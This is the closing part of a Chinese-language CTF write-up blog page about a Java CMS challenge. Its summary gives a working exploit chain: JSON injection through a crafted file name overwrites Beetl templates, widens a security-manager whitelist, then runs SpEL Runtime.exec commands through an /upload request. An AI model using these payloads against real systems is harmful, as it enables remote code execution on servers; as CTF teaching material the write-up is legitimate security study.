            <span class="token keyword">if</span><span class="token punctuation">(</span>Character<span class="token punctuation">.</span><span class="token function">isUpperCase</span><span class="token punctuation">(</span>pkg<span class="token punctuation">.</span><span class="token function">charAt</span><span class="token punctuation">(</span>c<span class="token operator">+</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
                classCall <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span>
            <span class="token keyword">if</span><span class="token punctuation">(</span>classCall<span class="token punctuation">)</span><span class="token punctuation">{</span>
                sb<span class="token punctuation">.</span><span class="token function">append</span><span class="token punctuation">(</span>pkg<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token string">"."</span><span class="token punctuation">,</span><span class="token string">"\\."</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span><span class="token keyword">else</span><span class="token punctuation">{</span>
                sb<span class="token punctuation">.</span><span class="token function">append</span><span class="token punctuation">(</span>pkg<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token string">"."</span><span class="token punctuation">,</span><span class="token string">"\\."</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">append</span><span class="token punctuation">(</span><span class="token string">"\\..*"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span>

            sb<span class="token punctuation">.</span><span class="token function">append</span><span class="token punctuation">(</span><span class="token string">"|"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        sb<span class="token punctuation">.</span><span class="token function">setLength</span><span class="token punctuation">(</span>sb<span class="token punctuation">.</span><span class="token function">length</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        callPattern <span class="token operator">=</span> Pattern<span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span>sb<span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>


<span class="token comment" spellcheck="true">//    public static void main(String[] args) {</span>
<span class="token comment" spellcheck="true">//</span>
<span class="token comment" spellcheck="true">//        {</span>
<span class="token comment" spellcheck="true">//            test("java.lang");</span>
<span class="token comment" spellcheck="true">//        }</span>
<span class="token comment" spellcheck="true">//</span>
<span class="token comment" spellcheck="true">//    }</span>

<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>能自己定义白名单类的话就随便绕了。</p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p>思路很明确：通过构造恶意的文件名打一个<code>JSON</code>注入攻击<code>parseObject</code>覆盖<code>/usr/local/tomcat/webapps/ROOT/WEB-INF/classes/templates/test.btl</code>，第一次文件写入调用<code>test</code>方法覆盖白名单多放点包路径。</p>
<pre class="line-numbers language-bash"><code class="language-bash">$<span class="token punctuation">{</span>@nese.elephantcms.common.WhiteListNativeSecurityManager.test<span class="token punctuation">(</span><span class="token string">'org.springframework,java.beans,venom.elephantcms'</span><span class="token punctuation">)</span><span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>第二次文件写入覆盖<code>upload.btl</code>打<code>RCE</code>即可。</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token variable">${@java.beans.Beans.instantiate(null,parameter.a).parseExpression(parameter.b).getValue()}</span>

/upload?a<span class="token operator">=</span>org.springframework.expression.spel.standard.SpelExpressionParser<span class="token operator">&amp;</span>b<span class="token operator">=</span>new java.util.Scanner<span class="token punctuation">(</span>T<span class="token punctuation">(</span>java.lang.Runtime<span class="token punctuation">)</span>.getRuntime<span class="token punctuation">(</span><span class="token punctuation">)</span>.exec<span class="token punctuation">(</span><span class="token string">'{command}'</span><span class="token punctuation">)</span>.getInputStream<span class="token punctuation">(</span><span class="token punctuation">))</span>.next<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>不过还有个坑点就是第二步覆盖的模板不能是<code>test.btl</code>了，可能是缓存的原因导致即便写入第二次的<code>payload</code>访问模板还是会执行第一次的<code>payload</code>。</p>
<p>梭：</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1708172558206.png" alt="1708172558206"></p>
<h4 id="非预期"><a href="#非预期" class="headerlink" title="非预期"></a>非预期</h4><p>“随便打打”师傅在比赛过程中做出了这道题，用的是<code>fastjson mysql</code>任意文件读出来的<code>flag</code>，我觉得只要审出来<code>json</code>拼接就算是预期。另外其实任意文件写<code>jsp</code>也可以（属实是小丑了），不过由于挖的那个<code>day</code>是<code>jfinal</code>框架写的，<code>filter</code>过滤了<code>jsp</code>，不过也有办法绕过就是了。<br>关于<code>jsp</code>写<code>webshell</code>需要分号<code>;</code>的问题（写不了分号的原因在上面提到了），我当时是没有解决所以这里预期解是覆盖<code>.btl</code>模版。现在想想应该有方法解决，之前读<code>RFC</code>标准的时候好像看到有可以<code>url</code>编码请求头的操作。</p>
<h3 id="自动化思路"><a href="#自动化思路" class="headerlink" title="自动化思路"></a>自动化思路</h3><p><code>github</code>是支持代码搜索的，所以我们可以通过<code>github</code>提供的搜索接口来寻找引入<code>ueditor</code>的<code>java</code>项目，但显然国内的<code>cms</code>引入<code>ueditor</code>会多一些，但可惜<code>gitee</code>上不提供代码检索功能，即便如此，我还是找到了一百多个项目。</p>
<p>第二步就是简单的污点分析，这一部分偷懒就命令行调<code>semgrep</code>来做（其实是不会），最后发现漏洞还是挺少的。。不过也算是一次尝试吧。</p>

    </div>

    
</div>
    <div class="footer" id="footer">
    <p><h4>版权所有 © 2020 | 作者: Squirt1e | 主题 By <a class="theme-author" target="_blank" rel="noopener" href="https://github.com/Xunzhuo/hexo-theme-coder" style="font-size:14px; color: #969696">Coder</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">本站浏览总访问量: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">本站访问人数: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="">
<input type="hidden" id="valine_appKey" value="">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
